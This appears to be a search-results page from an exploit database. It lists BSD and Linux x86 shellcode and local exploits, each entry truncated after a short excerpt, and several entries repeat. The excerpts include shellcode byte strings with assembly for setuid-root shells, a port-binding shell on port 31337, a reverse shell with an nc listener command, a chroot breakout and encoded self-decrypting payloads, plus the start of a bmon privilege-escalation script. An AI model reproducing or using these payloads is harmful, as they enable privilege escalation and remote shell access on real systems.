1471 matches found
CVE-2005-0637
CVE-2005-0637 concerns the copyout functions in locore.s (notably OpenBSD 3.5 and 3.6) which may allow an attacker to exceed certain address boundaries and modify kernel memory. The underlying issue is a boundary/offset handling in these copy routines that can bypass protection checks, leading to...
Debian top - Format String
Debian top - Format String source: https://www.securityfocus.com/bid/1895/info top is a program used to display system usage statistics in real time written by GoupSys Consulting but shipped by default as a core component with many operating systems. On BSD systems, top is installed setgid kmem s...
Debian top - Format String
source: https://www.securityfocus.com/bid/1895/info top is a program used to display system usage statistics in real time written by GoupSys Consulting but shipped by default as a core component with many operating systems. On BSD systems, top is installed setgid kmem so that it may read process...
BSD bmon 1.2.1_2 - Local acls Bypass
!/usr/local/bin/bash Written by Idan Nahoum. [email protected] local exploit for FreeBSD/OpenBSD with bmon default: $BMONEXEC" "$" -gt "0" && BMONEXEC="$1" -x "$BMONEXEC" || echo "$BMONEXEC not found" exit cd /tmp apparently bmon closes stdout, so we run a shell with stdout redirected to stderr. cat...
bsd/x86 portbind port 31337 83 bytes
Exploit for bsd/x86 platform in category shellcode ==================================== bsd/x86 portbind port 31337 83 bytes ==================================== / portbinding execve shellcode port 31337 bsd/x86 83b - no1 greyhats.za.net / char shellc0de= "\x99" // cdq "\x52" // pushl %edx...
bsd/x86 reverse portbind 129 bytes
Exploit for bsd/x86 platform in category shellcode ================================== bsd/x86 reverse portbind 129 bytes ================================== / reverse-portshell BSD shellcode by noir / / local usage: ./reverse-shell 192.168.2.33 / / remote: nc -n -v -v -l -p 6969 / / listen on...
bsd/x86 break chroot 45 bytes
Exploit for bsd/x86 platform in category shellcode ============================= bsd/x86 break chroot 45 bytes ============================= / BSD version FreeBSD, OpenBSD, NetBSD. email protected 45 bytes. -break chrooted / char shellcode= "\x68\x62\x2e\x2e\x2e" / pushl $0x2e2e2e62 / "\x89\xe7" ...
linux/x86 symlink /bin/sh xoring 56 bytes
Exploit for linux/x86 platform in category shellcode ========================================= linux/x86 symlink /bin/sh xoring 56 bytes ========================================= /The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. short version with anti IDS...
bsd/x86 execve /bin/sh setuid (0) 29 bytes
Exploit for bsd/x86 platform in category shellcode ========================================== bsd/x86 execve /bin/sh setuid 0 29 bytes ========================================== / BSD version FreeBSD, OpenBSD, NetBSD. email protected 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0...
bsd/x86 portbind port random 143 bytes
Exploit for bsd/x86 platform in category shellcode ====================================== bsd/x86 portbind port random 143 bytes ====================================== Here is a BSD remote shellcode. Tested on NetBSD . SHould work on FreeBSD and OpenBSD . by MayheM ExileCrew www.exile2k.org / 143...
bsd/x86 execve /bin/sh Crypt /bin/sh 49 bytes
Exploit for bsd/x86 platform in category shellcode ============================================= bsd/x86 execve /bin/sh Crypt /bin/sh 49 bytes ============================================= / Self decripting dec/inc shellcode executes /bin/sh Size 49 bytes OS BSD /rootteam/dev0id www.sysworld.net...
linux/x86 symlink /bin/sh xoring 56 bytes
No description provided by source. /The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. short version with anti IDS xoring size = 56 bytes OS = BSD written by /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme main: pop esi xor ecx,e...
linux/x86 symlink . /bin/sh 32 bytes
No description provided by source. /The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. short version size = 32 bytes OS = BSD written by /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme main: pop esi xor eax,eax mov byte esi+7,al...
bsd/x86 execve /bin/sh Crypt /bin/sh 49 bytes
No description provided by source. / Self decripting dec/inc shellcode executes /bin/sh Size 49 bytes OS BSD /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short shellcode main: pop esi xor ecx,ecx mov cl,28 maindecript: inc byte esi+ecx loop maindecript inc byte esi push esi...
bsd/x86 execve /bin/sh ENCRYPT* 57 bytes
No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 57 bytes. -Encriptado execve/bin/sh; Para mas informacion ver http://www.shellcode.com.ar/es/proyectos.html / char shellcode= "\xeb\x1b\x5e\x31\xc0\x6a\x1a\x6a\x17\x59\x49\x5b\x8a\x04\x0e"...
bsd/x86 execve /bin/sh setuid (0) 29 bytes
No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax "\xcd\x80" // int $0x80 "\x50" // push %eax...
bsd/x86 break chroot 45 bytes
No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 45 bytes. -break chrooted / char shellcode= "\x68\x62\x2e\x2e\x2e" / pushl $0x2e2e2e62 / "\x89\xe7" / movl %esp,%edi / "\x33\xc0" / xorl %eax,%eax / "\x88\x47\x03" / movb %al,0x3%edi / "\x57" /...
bsd/x86 portbind port random 143 bytes
No description provided by source. Here is a BSD remote shellcode. Tested on NetBSD . SHould work on FreeBSD and OpenBSD . by MayheM ExileCrew www.exile2k.org / 143 bytes / char shellcode = "\x31\xC0" "\x50" "\x50" "\xB0\x17" "\xCD\x80" // setuid "\x31\xC0" "\x50" "\x50" "\xB0\xB5" "\xCD\x80" //...
bsd/x86 - execve /bin/sh setuid 0 29 bytes
bsd/x86 execve /bin/sh setuid 0 29 bytes. Shellcode exploit for bsdx86 platform / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax...
bsd/x86 - portbind port 31337 83 bytes
bsd/x86 portbind port 31337 83 bytes. Shellcode exploit for bsdx86 platform / portbinding execve shellcode port 31337 bsd/x86 83b - no1 greyhats.za.net / char shellc0de= "\x99" // cdq "\x52" // pushl %edx "\x6a\x01" // pushl $0x01 "\x6a\x02" // pushl $0x02 "\xb0\x61" // movb $0x61,%al "\x50" //...